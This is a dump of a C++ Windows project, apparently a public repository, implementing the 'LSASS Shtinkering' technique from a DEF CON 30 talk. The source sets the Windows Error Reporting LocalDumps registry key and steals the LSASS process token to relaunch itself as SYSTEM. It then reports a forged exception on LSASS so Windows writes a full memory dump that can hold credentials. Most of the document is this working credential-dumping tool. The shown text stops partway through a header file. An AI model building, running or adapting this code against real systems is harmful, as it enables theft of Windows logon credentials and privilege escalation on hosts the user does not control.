├── LSASS_Shtinkering
    ├── Lsass_Shtinkering.h
    ├── x64
    │   └── Debug
    │   │   ├── Utils.obj
    │   │   ├── vc142.idb
    │   │   ├── vc142.pdb
    │   │   ├── LSASS_Shtinkering.ilk
    │   │   ├── Lsass_Shtinkering.obj
    │   │   ├── WerReportException.obj
    │   │   ├── LSASS_Sh.476fc126.tlog
    │   │       ├── CL.read.1.tlog
    │   │       ├── CL.write.1.tlog
    │   │       ├── CL.command.1.tlog
    │   │       ├── link.read.1.tlog
    │   │       ├── link.write.1.tlog
    │   │       ├── link.command.1.tlog
    │   │       └── LSASS_Shtinkering.lastbuildstate
    │   │   ├── LSASS_Shtinkering.exe.recipe
    │   │   └── LSASS_Shtinkering.log
    ├── LSASS_Shtinkering.vcxproj.user
    ├── WerReportException.h
    ├── Utils.h
    ├── LSASS_Shtinkering.vcxproj.filters
    ├── Utils.cpp
    ├── Lsass_Shtinkering.cpp
    ├── ntddk.h
    ├── LSASS_Shtinkering.vcxproj
    └── WerReportException.cpp
├── README.md
└── LSASS_Shtinkering.sln


/LSASS_Shtinkering/Lsass_Shtinkering.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "WerReportException.h"
3 | 


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/Utils.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/Utils.obj


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/vc142.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/vc142.idb


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/vc142.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/vc142.pdb


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Shtinkering.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/LSASS_Shtinkering.ilk


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/Lsass_Shtinkering.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/Lsass_Shtinkering.obj


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/WerReportException.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/WerReportException.obj


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JDArmy/Lsass-Shtinkering/HEAD/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/LSASS_Shtinkering/LSASS_Shtinkering.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/LSASS_Shtinkering/WerReportException.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include "Utils.h"
 3 | #include "ntddk.h"
 4 | #include <sstream>
 5 | #include <ntstatus.h>
 6 | 
 7 | using std::to_string;
 8 | using std::to_wstring;
 9 | 
10 | BOOL ReportExceptionToWer(DWORD ProcessPid, HANDLE ProcessHandle);


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Sh.476fc126.tlog/LSASS_Shtinkering.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:VCServicingVersionMFC=14.29.30136:VCServicingVersionCrtHeaders=14.29.30136:TargetPlatformVersion=10.0.18362.0:
2 | Debug|x64|C:\Users\windows7\Desktop\Lsass-Shtinkering-main\Lsass-Shtinkering-main\|
3 | 


--------------------------------------------------------------------------------
/LSASS_Shtinkering/Utils.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <string>
 3 | #include <stdexcept>
 4 | #include <iostream>
 5 | #include <Windows.h>
 6 | #include <tlhelp32.h>
 7 | 
 8 | using std::endl;
 9 | using std::wcout;
10 | using std::string;
11 | using std::wstring;
12 | using std::runtime_error;
13 | 
14 | DWORD GetLsassPid();
15 | BOOL IsLocalSystem();
16 | DWORD GetFirstThread(DWORD Pid);
17 | void PrintCrashDampLocation();


--------------------------------------------------------------------------------
/LSASS_Shtinkering/x64/Debug/LSASS_Shtinkering.exe.recipe:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project>
 3 |   <ProjectOutputs>
 4 |     <ProjectOutput>
 5 |       <FullPath>C:\Users\windows7\Desktop\Lsass-Shtinkering-main\Lsass-Shtinkering-main\x64\Debug\LSASS_Shtinkering.exe</FullPath>
 6 |     </ProjectOutput>
 7 |   </ProjectOutputs>
 8 |   <ContentFiles />
 9 |   <SatelliteDlls />
10 |   <NonRecipeFileRefs />
11 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Lsass-Shtinkering
2 | dump lsass tool
3 | 
4 | 详情见：https://mp.weixin.qq.com/s?__biz=Mzk0ODI2NjUzMQ==&mid=2247483998&idx=1&sn=2385e3e7b6caca785d8e3e9ce3373548&chksm=c36b7112f41cf8043bd283cb39263c2c4d5e0e11b38a7d170c64762d132eabb3420018e6b499&token=162988171&lang=zh_CN#rd
5 | 
6 | ## References
7 | 
8 | - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
9 | 


--------------------------------------------------------------------------------
/LSASS_Shtinkering.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.32407.337
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LSASS_Shtinkering", "LSASS_Shtinkering\LSASS_Shtinkering.vcxproj", "{476FC126-239F-4D58-8389-E1C0E93C2C5E}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{476FC126-239F-4D58-8389-E1C0E93C2C5E}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{476FC126-239F-4D58-8389-E1C0E93C2C5E}.Debug|x64.Build.0 = Debug|x64
18 | 		{476FC126-239F-4D58-8389-E1C0E93C2C5E}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{476FC126-239F-4D58-8389-E1C0E93C2C5E}.Debug|x86.Build.0 = Debug|Win32
20 | 		{476FC126-239F-4D58-8389-E1C0E93C2C5E}.Release|x64.ActiveCfg = Release|x64
21 | 		{476FC126-239F-4D58-8389-E1C0E93C2C5E}.Release|x64.Build.0 = Release|x64
22 | 		{476FC126-239F-4D58-8389-E1C0E93C2C5E}.Release|x86.ActiveCfg = Release|Win32
23 | 		{476FC126-239F-4D58-8389-E1C0E93C2C5E}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {7CDF1F4C-173E-42D6-AC24-6C2F9795B327}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/LSASS_Shtinkering/LSASS_Shtinkering.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="Lsass_Shtinkering.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="Utils.cpp">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |     <ClCompile Include="WerReportException.cpp">
25 |       <Filter>Source Files</Filter>
26 |     </ClCompile>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClInclude Include="Lsass_Shtinkering.h">
30 |       <Filter>Header Files</Filter>
31 |     </ClInclude>
32 |     <ClInclude Include="Utils.h">
33 |       <Filter>Header Files</Filter>
34 |     </ClInclude>
35 |     <ClInclude Include="WerReportException.h">
36 |       <Filter>Header Files</Filter>
37 |     </ClInclude>
38 |     <ClInclude Include="ntddk.h">
39 |       <Filter>Header Files</Filter>
40 |     </ClInclude>
41 |   </ItemGroup>
42 | </Project>


--------------------------------------------------------------------------------
/LSASS_Shtinkering/Utils.cpp:
--------------------------------------------------------------------------------
 1 | #include "Utils.h"
 2 | 
 3 | DWORD GetServicePid(const wstring& ServiceName)
 4 | {
 5 | 	const SC_HANDLE controlManagerHandle = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_CONNECT);
 6 | 	if (nullptr == controlManagerHandle)
 7 | 		throw runtime_error("Connecting to Service Control Manager failed");
 8 | 
 9 | 	const SC_HANDLE serviceHandle = OpenServiceW(controlManagerHandle, ServiceName.c_str(), SERVICE_QUERY_STATUS);
10 | 	CloseServiceHandle(controlManagerHandle);
11 | 	if (nullptr == serviceHandle)
12 | 		throw runtime_error("Opening service handle failed");
13 | 
14 | 	SERVICE_STATUS_PROCESS procInfo;
15 | 	DWORD bytesNeeded;
16 | 	if (!QueryServiceStatusEx(serviceHandle, SC_STATUS_PROCESS_INFO, reinterpret_cast<LPBYTE>(&procInfo), sizeof(SERVICE_STATUS_PROCESS), &bytesNeeded))
17 | 	{
18 | 		CloseServiceHandle(serviceHandle);
19 | 		throw runtime_error("Querying service status failed");
20 | 	}
21 | 
22 | 	CloseServiceHandle(serviceHandle);
23 | 	return procInfo.dwProcessId;
24 | }
25 | 
26 | DWORD GetLsassPid()
27 | {
28 | 	return GetServicePid(L"samss");
29 | }
30 | 
31 | BOOL IsLocalSystem()
32 | {
33 | 	const HANDLE tokenHandle = GetCurrentProcessToken();
34 | 	DWORD tokenInformationSize = 0;
35 | 	GetTokenInformation(tokenHandle, TokenUser, nullptr, 0, &tokenInformationSize);
36 | 
37 | 	// The first call should fail because the buffer pointer is null. It is made to retrieve the required size of the buffer
38 | 	if (ERROR_INSUFFICIENT_BUFFER != GetLastError())
39 | 		throw runtime_error("Getting buffer size from GetTokenInformation failed");
40 | 
41 | 	// Allocate the memory required to store the info
42 | 	const auto tokenInfoBuffer = new uint8_t[tokenInformationSize];
43 | 
44 | 	// Call GetTokenInformation again with a pointer to a buffer
45 | 	if (!GetTokenInformation(tokenHandle, TokenUser, tokenInfoBuffer, tokenInformationSize, &tokenInformationSize))
46 | 	{
47 | 		delete[] tokenInfoBuffer;
48 | 		throw runtime_error("Retrieving info from GetTokenInformation failed");
49 | 	}
50 | 
51 | 	const auto tokenUser = reinterpret_cast<PTOKEN_USER>(tokenInfoBuffer);
52 | 	const BOOL isSystem = IsWellKnownSid(tokenUser->User.Sid, WinLocalSystemSid);
53 | 	delete[] tokenInfoBuffer;
54 | 	return isSystem;
55 | }
56 | 
57 | DWORD GetFirstThread(const DWORD Pid)
58 | {
59 | 	const HANDLE snapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
60 | 
61 | 	if (INVALID_HANDLE_VALUE == snapshotHandle)
62 | 		throw runtime_error("Creating threads snapshot failed");
63 | 
64 | 	DWORD threadId = 0;
65 | 	THREADENTRY32 threadEntry;
66 | 	threadEntry.dwSize = sizeof(THREADENTRY32);
67 | 	if (Thread32First(snapshotHandle, &threadEntry))
68 | 	{
69 | 		do {
70 | 			if (threadEntry.th32OwnerProcessID == Pid) {
71 | 				threadId = threadEntry.th32ThreadID;
72 | 			}
73 | 		} while (Thread32Next(snapshotHandle, &threadEntry));
74 | 
75 | 	}
76 | 
77 | 	CloseHandle(snapshotHandle);
78 | 	return threadId;
79 | }
80 | 
81 | void PrintCrashDampLocation()
82 | {
83 | 	DWORD bufferSize = 32767;
84 | 	std::wstring environmentVariable;
85 | 	environmentVariable.resize(bufferSize);
86 | 	bufferSize = GetEnvironmentVariableW(L"LocalAppData", &environmentVariable[0], bufferSize);
87 | 	if (!bufferSize)
88 | 		throw runtime_error("Retrieving %LocalAppData% failed");
89 | 	environmentVariable.resize(bufferSize);
90 | 	environmentVariable.append(L"\\CrashDumps");
91 | 	std::wcout << L"[*] Crash dumps directory: " << environmentVariable << endl;
92 | }


--------------------------------------------------------------------------------
/LSASS_Shtinkering/Lsass_Shtinkering.cpp:
--------------------------------------------------------------------------------
  1 | #include "Lsass_Shtinkering.h"
  2 | 
  3 | #include<iostream>
  4 | #include<windows.h>
  5 | #include <userenv.h>
  6 | 
  7 | #define UNLEN       256   
  8 | using namespace std;
  9 | 
 10 | BOOL setPrivilege(HANDLE hToken, LPCWSTR name) {
 11 | 	TOKEN_PRIVILEGES tp;
 12 | 	LUID luid;
 13 | 
 14 | 
 15 | 	if (!LookupPrivilegeValue(NULL, name, &luid)) {
 16 | 		cout << "privilege error:" << GetLastError() << endl;
 17 | 		return FALSE;
 18 | 	}
 19 | 	tp.PrivilegeCount = 1;
 20 | 	tp.Privileges[0].Luid = luid;
 21 | 	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 22 | 	if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) {
 23 | 		cout << "adjustprivileges error:" << GetLastError() << endl;
 24 | 		return FALSE;
 25 | 	}
 26 | 	return TRUE;
 27 | }
 28 | 
 29 | BOOL GetLocalSystem(HANDLE hSystemToken)
 30 | {
 31 | 	BOOL bResult = FALSE;
 32 | 
 33 | 	HANDLE hSystemTokenDup = INVALID_HANDLE_VALUE;
 34 | 
 35 | 	DWORD dwCreationFlags = 0;
 36 | 	LPWSTR pwszCurrentDirectory = NULL;
 37 | 	LPVOID lpEnvironment = NULL;
 38 | 	PROCESS_INFORMATION pi = { 0 };
 39 | 	STARTUPINFO si = { 0 };
 40 | 
 41 | 	BOOL g_bInteractWithConsole = FALSE;
 42 | 	WCHAR fileName[UNLEN];
 43 | 	GetModuleFileNameW(NULL, fileName, UNLEN);
 44 | 	/*
 45 | 		if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hSystemToken))
 46 | 		{
 47 | 			wprintf(L"OpenThreadToken(). Error: %d\n", GetLastError());
 48 | 			goto cleanup;
 49 | 		}
 50 | 	*/
 51 | 	if (!DuplicateTokenEx(hSystemToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hSystemTokenDup))
 52 | 	{
 53 | 		wprintf(L"DuplicateTokenEx() failed. Error: %d\n", GetLastError());
 54 | 		goto cleanup;
 55 | 	}
 56 | 
 57 | 
 58 | 
 59 | 	dwCreationFlags = CREATE_UNICODE_ENVIRONMENT;
 60 | 	dwCreationFlags |= g_bInteractWithConsole ? 0 : CREATE_NEW_CONSOLE;
 61 | 
 62 | 	if (!(pwszCurrentDirectory = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR))))
 63 | 		goto cleanup;
 64 | 
 65 | 	if (!GetSystemDirectory(pwszCurrentDirectory, MAX_PATH))
 66 | 	{
 67 | 		wprintf(L"GetSystemDirectory() failed. Error: %d\n", GetLastError());
 68 | 		goto cleanup;
 69 | 	}
 70 | 
 71 | 	if (!CreateEnvironmentBlock(&lpEnvironment, hSystemTokenDup, FALSE))
 72 | 	{
 73 | 		wprintf(L"CreateEnvironmentBlock() failed. Error: %d\n", GetLastError());
 74 | 		goto cleanup;
 75 | 	}
 76 | 
 77 | 	ZeroMemory(&si, sizeof(STARTUPINFO));
 78 | 	si.cb = sizeof(STARTUPINFO);
 79 | 	si.lpDesktop = const_cast<wchar_t*>(L"WinSta0\\Default");
 80 | 
 81 | 
 82 | 	if (!g_bInteractWithConsole)
 83 | 	{
 84 | 		if (!CreateProcessWithTokenW(hSystemTokenDup, LOGON_WITH_PROFILE, NULL, fileName, dwCreationFlags, lpEnvironment, pwszCurrentDirectory, &si, &pi))
 85 | 		{
 86 | 			wprintf(L"CreateProcessWithTokenW() failed. Error: %d\n", GetLastError());
 87 | 			goto cleanup;
 88 | 		}
 89 | 		else
 90 | 		{
 91 | 			wprintf(L"[+] CreateProcessWithTokenW() OK\n");
 92 | 		}
 93 | 	}
 94 | 	else
 95 | 	{
 96 | 		wprintf(L"[!] CreateProcessWithTokenW() isn't compatible with option -i\n");
 97 | 		goto cleanup;
 98 | 	}
 99 | 
100 | 
101 | 	if (g_bInteractWithConsole)
102 | 	{
103 | 		fflush(stdout);
104 | 		WaitForSingleObject(pi.hProcess, INFINITE);
105 | 	}
106 | 
107 | 	bResult = TRUE;
108 | 
109 | cleanup:
110 | 	if (hSystemToken)
111 | 		CloseHandle(hSystemToken);
112 | 	if (hSystemTokenDup)
113 | 		CloseHandle(hSystemTokenDup);
114 | 	if (pwszCurrentDirectory)
115 | 		free(pwszCurrentDirectory);
116 | 	if (lpEnvironment)
117 | 		DestroyEnvironmentBlock(lpEnvironment);
118 | 	if (pi.hProcess)
119 | 		CloseHandle(pi.hProcess);
120 | 	if (pi.hThread)
121 | 		CloseHandle(pi.hThread);
122 | 
123 | 	return bResult;
124 | }
125 | 
126 | void getSystem() {
127 | 	HANDLE tokenHandle = NULL;
128 | 	HANDLE currentTokenHandle = NULL;
129 | 	BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
130 | 	setPrivilege(currentTokenHandle, SE_TCB_NAME);
131 | 	setPrivilege(currentTokenHandle, SE_DEBUG_NAME);
132 | 
133 | 	HANDLE test = OpenProcess(PROCESS_QUERY_INFORMATION, true, GetLsassPid());
134 | 	if (GetLastError() == NULL) {
135 | 		cout << "ok" << endl;
136 | 	}
137 | 	else {
138 | 		cout << "openProcess return Code:" << test << endl;
139 | 		cout << "openProcess Error:" << GetLastError() << endl;
140 | 	}
141 | 	BOOL getToken = OpenProcessToken(test, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &tokenHandle);
142 | 	//BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
143 | 
144 | 
145 | 	if (GetLastError() == NULL) {
146 | 		cout << "winlogon Impersonate ok " << endl;
147 | 	}
148 | 	else {
149 | 		cout << "something impeersonate error" << GetLastError() << endl;
150 | 	}
151 | 	GetLocalSystem(tokenHandle);
152 | }
153 | bool changeReg() {
154 | 	//check reg 
155 | 	HKEY hRoot = HKEY_LOCAL_MACHINE;
156 | 	WCHAR szSubKey[UNLEN] = L"SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps";
157 | 	HKEY hKey;
158 | 
159 | 	DWORD dwDisposition = REG_OPENED_EXISTING_KEY;	
160 | 	LONG lRet = RegCreateKeyExW(hRoot, szSubKey, 0, NULL,
161 | 		REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
162 | 	if (lRet == ERROR_SUCCESS)
163 | 	{
164 | 		wcout << L"reg create ok!" << endl;
165 | 	}
166 | 
167 | 	DWORD type = 2;
168 | 	lRet = RegSetValueExW(hKey, L"DumpType", 0,REG_DWORD , (BYTE*)&type, sizeof(type));
169 | 	if (lRet == ERROR_SUCCESS)
170 | 	{
171 | 		wcout << L"reg set ok!" << endl;
172 | 		return TRUE;
173 | 	}
174 | 	RegCloseKey(hKey);
175 | 	return FALSE;
176 | }
177 | 
178 | int main(int argc, char* argv[])
179 | {
180 | 
181 | 	DWORD processPid;
182 | 	HANDLE processHandle;
183 | 
184 | 	wcout << L"file is in C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps" << endl;
185 | 	try
186 | 	{
187 | 		if (changeReg()) {
188 | 			wcout << L"reg change ok!" << endl;
189 | 		}
190 | 		else {
191 | 			wcout << L"reg is error!" << endl;
192 | 			return 0;
193 | 		}
194 | 		
195 | 		if (IsLocalSystem())
196 | 			wcout << L"process runs as NT AUTHORITY\\SYSTEM" << endl;
197 | 		else
198 | 		{
199 | 			wcout << L"process must run as NT AUTHORITY\\SYSTEM to dump lsass memory" << endl;
200 | 			wcout << L"start this process with system privilege " << endl;
201 | 			getSystem();
202 | 			return 0;
203 | 		}
204 | 		processPid = GetLsassPid();
205 | 		processHandle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION, TRUE, processPid);
206 | 
207 | 		wcout << L"[*] Reporting exception on LSASS PID: 0x" << std::hex << processPid << endl;
208 | 		ReportExceptionToWer(processPid, processHandle);
209 | 		wcout << L"[V] Exception reported successfully!" << endl;
210 | 		PrintCrashDampLocation();
211 | 		
212 | 	}
213 | 	catch (std::exception& exception)
214 | 	{
215 | 		wcout << L"[X] Error: " << exception.what() << endl;
216 | 	}
217 | 	
218 | 	
219 | }
220 | 


--------------------------------------------------------------------------------
/LSASS_Shtinkering/ntddk.h:
--------------------------------------------------------------------------------
  1 | #ifndef __NTDLL_H__
  2 | #define __NTDLL_H__
  3 | 
  4 | #ifdef __cplusplus
  5 | extern "C" {
  6 | #endif
  7 | #include <Windows.h>
  8 | 
  9 | #ifndef _NTDLL_SELF_                            // Auto-insert the library
 10 | #pragma comment(lib, "Ntdll.lib")
 11 | #endif
 12 | 
 13 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
 14 | #define EVENT_QUERY_STATE 0x0001
 15 | #define ALPC_MSGFLG_SYNC_REQUEST 0x20000
 16 | 
 17 | typedef short CSHORT;
 18 | typedef struct _QUAD
 19 | {
 20 | 	union
 21 | 	{
 22 | 		INT64 UseThisFieldToCopy;
 23 | 		float DoNotUseThisField;
 24 | 	};
 25 | } QUAD, * PQUAD;
 26 | 
 27 | typedef struct _CLIENT_ID
 28 | {
 29 | 	HANDLE UniqueProcess;
 30 | 	HANDLE UniqueThread;
 31 | 
 32 | } CLIENT_ID, * PCLIENT_ID;
 33 | 
 34 | typedef struct PORT_MESSAGE
 35 | {
 36 | 	union
 37 | 	{
 38 | 		struct
 39 | 		{
 40 | 			CSHORT DataLength;
 41 | 			CSHORT TotalLength;
 42 | 		} s1;
 43 | 		ULONG Length;
 44 | 	} u1;
 45 | 	union
 46 | 	{
 47 | 		struct
 48 | 		{
 49 | 			CSHORT Type;
 50 | 			CSHORT DataInfoOffset;
 51 | 		} s2;
 52 | 		ULONG ZeroInit;
 53 | 	} u2;
 54 | 	union
 55 | 	{
 56 | 		CLIENT_ID ClientId;
 57 | 		QUAD DoNotUseThisField;
 58 | 	};
 59 | 	ULONG MessageId;
 60 | 	union
 61 | 	{
 62 | 		SIZE_T ClientViewSize;
 63 | 		ULONG CallbackId;
 64 | 	};
 65 | } PORT_MESSAGE, * PPORT_MESSAGE;
 66 | 
 67 | struct ReportExceptionWerAlpcMessage
 68 | {
 69 | 	PORT_MESSAGE PortMessage;
 70 | 	DWORD MessageType;
 71 | 	NTSTATUS NtStatusErrorCode;
 72 | 	DWORD Flags;
 73 | 	DWORD TargetProcessId;
 74 | 	HANDLE hFileMapping;
 75 | #ifndef _WIN64
 76 | 	DWORD Filler0;
 77 | #endif
 78 | 	HANDLE hRecoveryEvent;
 79 | #ifndef _WIN64
 80 | 	DWORD Filler1;
 81 | #endif
 82 | 	HANDLE hCompletionEvent;
 83 | #ifndef _WIN64
 84 | 	DWORD Filler2;
 85 | #endif
 86 | 	HANDLE hFileMapping2;
 87 | #ifndef _WIN64
 88 | 	DWORD Filler3;
 89 | #endif
 90 | 	HANDLE hTargetProcess;
 91 | #ifndef _WIN64
 92 | 	DWORD Filler4;
 93 | #endif
 94 | 	HANDLE hTargetThread;
 95 | #ifndef _WIN64
 96 | 	DWORD Filler5;
 97 | #endif
 98 | 	DWORD Filler6[324];
 99 | };
100 | 
101 | struct MappedViewStruct
102 | {
103 | 	DWORD Size;
104 | 	DWORD TargetProcessPid;
105 | 	DWORD TargetThreadTid;
106 | 	DWORD Filler0[39];
107 | 	_EXCEPTION_POINTERS* ExceptionPointers;
108 | #ifndef _WIN64
109 | 	DWORD Filler1;
110 | #endif
111 | 	DWORD NtErrorCode;
112 | 	DWORD Filler2;
113 | 	HANDLE hTargetProcess;
114 | #ifndef _WIN64
115 | 	DWORD Filler3;
116 | #endif
117 | 	HANDLE hTargetThread;
118 | #ifndef _WIN64
119 | 	DWORD Filler4;
120 | #endif
121 | 	HANDLE hRecoveryEvent;
122 | #ifndef _WIN64
123 | 	DWORD Filler5;
124 | #endif
125 | 	HANDLE hCompletionEvent;
126 | #ifndef _WIN64
127 | 	DWORD Filler6;
128 | #endif
129 | 	DWORD Filler7;
130 | 	DWORD Filler8;
131 | 	DWORD Null01;
132 | 	DWORD Null02;
133 | 	DWORD NtStatusErrorCode;
134 | 	DWORD Null03;
135 | 	DWORD TickCount;
136 | 	DWORD Unk101;
137 | };
138 | 
139 | typedef struct _WNF_TYPE_ID {
140 | 	GUID	TypeId;
141 | } WNF_TYPE_ID, * PWNF_TYPE_ID;
142 | typedef const WNF_TYPE_ID* PCWNF_TYPE_ID;
143 | typedef ULONG WNF_CHANGE_STAMP, * PWNF_CHANGE_STAMP;
144 | typedef ULONG LOGICAL;
145 | typedef ULONG* PLOGICAL;
146 | 
147 | typedef struct _UNICODE_STRING
148 | {
149 | 	USHORT Length;
150 | 	USHORT MaximumLength;
151 | 	PWSTR  Buffer;
152 | 
153 | } UNICODE_STRING, * PUNICODE_STRING;
154 | 
155 | typedef struct _OBJECT_ATTRIBUTES
156 | {
157 | 	ULONG Length;
158 | 	HANDLE RootDirectory;
159 | 	PUNICODE_STRING ObjectName;
160 | 	ULONG Attributes;
161 | 	PVOID SecurityDescriptor;
162 | 	PVOID SecurityQualityOfService;
163 | 
164 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
165 | 
166 | typedef struct _ALPC_PORT_ATTRIBUTES
167 | {
168 | 	ULONG Flags;
169 | 	SECURITY_QUALITY_OF_SERVICE SecurityQos;
170 | 	SIZE_T MaxMessageLength;
171 | 	SIZE_T MemoryBandwidth;
172 | 	SIZE_T MaxPoolUsage;
173 | 	SIZE_T MaxSectionSize;
174 | 	SIZE_T MaxViewSize;
